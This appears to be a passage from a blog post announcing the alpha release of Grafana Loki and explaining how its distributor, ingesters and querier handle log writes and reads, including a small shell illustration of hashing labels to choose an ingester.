Distributor

Once promtail collects and sends the logs to Loki, the distributor is the first component to receive them. We could be receiving millions of writes per second, and we wouldn’t want to write them to a database as they come in; that would kill any database out there. We need to batch and compress the data as it comes in.

We do this by building compressed chunks of the data, gzipping logs as they come in. The ingester component is a stateful component in charge of building and then later flushing the chunks. We have multiple ingesters, and the logs belonging to each stream should always end up in the same ingester so that all the relevant entries end up in the same chunk. We do this by building a ring of ingesters and using consistent hashing. When an entry comes in, the distributor hashes the labels of the logs and then looks up which ingester to send the entry to based on the hash value.
Loki: Distributor

Further, for redundancy and resilience, we replicate each entry n times (3 by default).
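As a toy shell illustration of the deterministic mapping described above (not Loki's actual ring; the real distributor uses consistent hashing so that adding or removing ingesters moves as few streams as possible):

  labels='{namespace="prod", name="ingester"}'
  h=$(printf '%s' "$labels" | md5sum | cut -c1-8)     # hash the stream's label set
  echo "ingester-$(( 16#$h % 3 ))"                    # the same labels always map to the same one of 3 ingesters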

Ingester

Now the ingester will receive the entries and start building chunks.
Loki: Ingester

This is basically gzipping the logs and appending them. Once the chunk “fills up”, we flush it to the database. We use separate databases for the chunks (ObjectStorage) and the index, as the type of data they store is different.


After flushing a chunk, the ingester then creates a new empty chunk and adds the new entries into that chunk.

Querier

The read path is quite simple and has the querier doing most of the heavy lifting. Given a time-range and label selectors, it looks at the index to figure out which chunks match, and greps through them to give you the results. It also talks to the ingesters to get the recent data that has not been flushed yet.

Note that, right now, a single querier greps through all the relevant logs for each query. We’ve implemented query parallelisation in Cortex using a frontend, and the same approach can be extended to Loki to give a distributed grep, which will make even large queries snappy.

Loki: A look at the Querier

Scalability

Now let’s see if this scales.

  1. We’re putting the chunks into an object store and that scales.
  2. We put the index into Cassandra/Bigtable/DynamoDB which again scales.
  3. The distributors and queriers are stateless components that you can horizontally scale.

The ingester is a stateful component, but we’ve built the full sharding and resharding lifecycle into it. When a rollout happens or when ingesters are scaled up or down, the ring topology changes and the ingesters redistribute their chunks to match the new topology. This is mostly code taken from Cortex, which has been running in production for more than 2 years.

Caveats

While all of this works conceptually, we expect to hit new issues and limitations as we grow. It should be super cheap to run, given all the data will be sitting in an Object Store like S3. But you would only be able to grep through the data. This might not be suitable for other use-cases like alerting or building dashboards, which you’re better off doing in metrics.

Conclusion

Loki is very much alpha software and should not be used in production environments. We wanted to announce and release Loki as soon as possible to get feedback and contributions from the community and find out what’s working and what needs improvement. We believe this will help us deliver a higher quality and more on-point production release next year.

Loki can be run on-prem or as a free demo on Grafana Cloud. We urge you to give it a try and drop us a line and let us know what you think. Visit the Loki homepage to get started today.
